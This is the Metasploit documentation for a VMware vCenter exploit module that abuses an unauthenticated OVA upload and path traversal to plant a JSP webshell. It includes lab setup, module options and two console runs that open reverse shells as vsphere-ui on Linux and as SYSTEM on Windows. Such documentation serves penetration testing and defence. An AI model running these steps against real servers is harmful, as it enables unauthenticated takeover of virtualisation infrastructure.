vmware_vcenter_uploadova_rce.md

/documentation/modules/exploit/multi/http/vmware_vcenter_uploadova_rce.md

https://github.com/rapid7/metasploit-framework
Markdown | 179 lines | 135 code | 44 blank | 0 comment | 0 complexity | 00f6c9db87388c1ed90b56bf36600557 MD5 | raw file

## Vulnerable Application

### Description

This module exploits an unauthenticated OVA file upload and path
traversal in VMware vCenter Server to write a JSP payload to a
web-accessible directory.

Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.
Note that later vulnerable versions of the Linux appliance aren't
exploitable via the webshell technique. Furthermore, writing an SSH
public key to `/home/vsphere-ui/.ssh/authorized_keys` works, but the
user's non-existent password expires 90 days after install, rendering
the technique nearly useless against production environments.

You'll have the best luck targeting older versions of the Linux
appliance. The Windows target should work ubiquitously.

### Setup

Follow [VMware's official
documentation](https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vcenter.install.doc/GUID-8DC3866D-5087-40A2-8067-1361A2AF95BD.html)
on installing and configuring vCenter Server, or you can wing it like
me. The Linux appliance is meant to be deployed via ESXi, but I
short-circuited the procedure by mounting the ISO and importing the OVA
directly into VMware Fusion (or your desired hypervisor). YMMV.

```
wvu@kharak:~/Downloads$ hdiutil attach VMware-VCSA-all-6.7.0-11726888.iso
/dev/disk2          	                               	/Volumes/VMware VCSA
wvu@kharak:~/Downloads$ ls -l /Volumes/VMware\ VCSA/vcsa
total 4621748
-r-xr-xr-x  1 wvu  staff  2366330368 Jan 10  2019 VMware-vCenter-Server-Appliance-6.7.0.21000-11726888_OVF10.ova
dr-xr-xr-x  5 wvu  staff        2048 Jan 10  2019 ovftool
-r-xr-xr-x  1 wvu  staff          52 Jan 10  2019 version.txt
wvu@kharak:~/Downloads$
```

If you're using the workaround above, you'll need to connect to HTTPS
port 5480 to complete [Stage
2](https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vcenter.install.doc/GUID-CA114526-A413-4219-9FA7-F5A9E9ACA357.html)
of the faux deployment. You may need to set a root password in the
console first. The vSphere Client should be accessible on port 443 after
Stage 2 is complete.

You'll want to test versions earlier than 6.7 Update 3l, since that's
patched. Later vulnerable versions of the Linux appliance aren't
exploitable via the webshell technique. I haven't been able to download
and test them all. Sorry.

**Note:** If you're testing on Windows, using Windows Server 2019 will
fail miserably. Please use [Windows Server 2016 or
earlier](https://kb.vmware.com/s/article/2091273). It must be Windows
Server. I can't stress this enough!

**PROTIP:** Removing or otherwise disabling DNS resolution in the Linux
appliance will make setup run faster if you don't have an FQDN and DNS
server to back it up. This didn't seem to make a difference on Windows.

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

This targets the Linux appliance with a JSP payload. `VMware vCenter
Server <= 6.7 Update 1b (Linux)` is supported.

### 1

This targets the Windows install with a JSP payload. `VMware vCenter
Server <= 6.7 Update 3j (Windows)` is supported.

## Options

### SprayAndPrayMin

Spray JSP payload path starting at this index.

### SprayAndPrayMax

Spray JSP payload path stopping at this index.

## Scenarios

### VMware vCenter Server 6.7 Update 1b (Linux appliance)

```
msf6 > use exploit/multi/http/vmware_vcenter_uploadova_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > options

Module options (exploit/multi/http/vmware_vcenter_uploadova_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   VMware vCenter Server <= 6.7 Update 1b (Linux)


msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set rhosts 192.168.123.135
rhosts => 192.168.123.135
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/vmware/esx_fingerprint as check
[+] 192.168.123.135:443 - Identified VMware vCenter Server 6.7.0 build-11727113
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable. Unauthenticated endpoint access granted.
[*] Uploading OVA file: O2qAd1Y7t0bhyUQFJ32Vyre6TQHcGoun.ova
[+] Successfully uploaded OVA file
[*] Requesting JSP payload: https://192.168.123.135/ui/resources/gVh2ROzD9QyyGNF6.jsp
[+] Successfully requested JSP payload
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.135:55342) at 2021-03-05 16:49:05 -0600
[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/gVh2ROzD9QyyGNF6.jsp
[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/gVh2ROzD9QyyGNF6.jsp

id
uid=1016(vsphere-ui) gid=100(users) groups=100(users),59001(cis)
uname -a
Linux photon-machine 4.4.161-1.ph1 #1-photon SMP Wed Oct 17 12:15:18 UTC 2018 x86_64 GNU/Linux
^Z
Background session 1? [y/N]  y
```

### VMware vCenter Server 6.7 Update 3j on Windows Server 2016

```
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set target 1
target => 1
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set rhosts 192.168.123.194
rhosts => 192.168.123.194
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/vmware/esx_fingerprint as check
[+] 192.168.123.194:443 - Identified VMware vCenter Server 6.7.0 build-16709044
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable. Unauthenticated endpoint access granted.
[*] Uploading OVA file: 0ggORbkxAcptUeH6U5S8.ova
[+] Successfully uploaded OVA file
[*] Requesting JSP payload: https://192.168.123.194/statsreport/UQbpAxH7WTmrzqcb7AugtYnMB2z0.jsp
[+] Successfully requested JSP payload
[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.194:55411) at 2021-03-05 16:50:29 -0600
[!] Tried to delete /ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/UQbpAxH7WTmrzqcb7AugtYnMB2z0.jsp, unknown result


C:\Program Files\VMware\vCenter Server\perfcharts\wrapper\bin>whoami
whoami
nt authority\system

C:\Program Files\VMware\vCenter Server\perfcharts\wrapper\bin>
```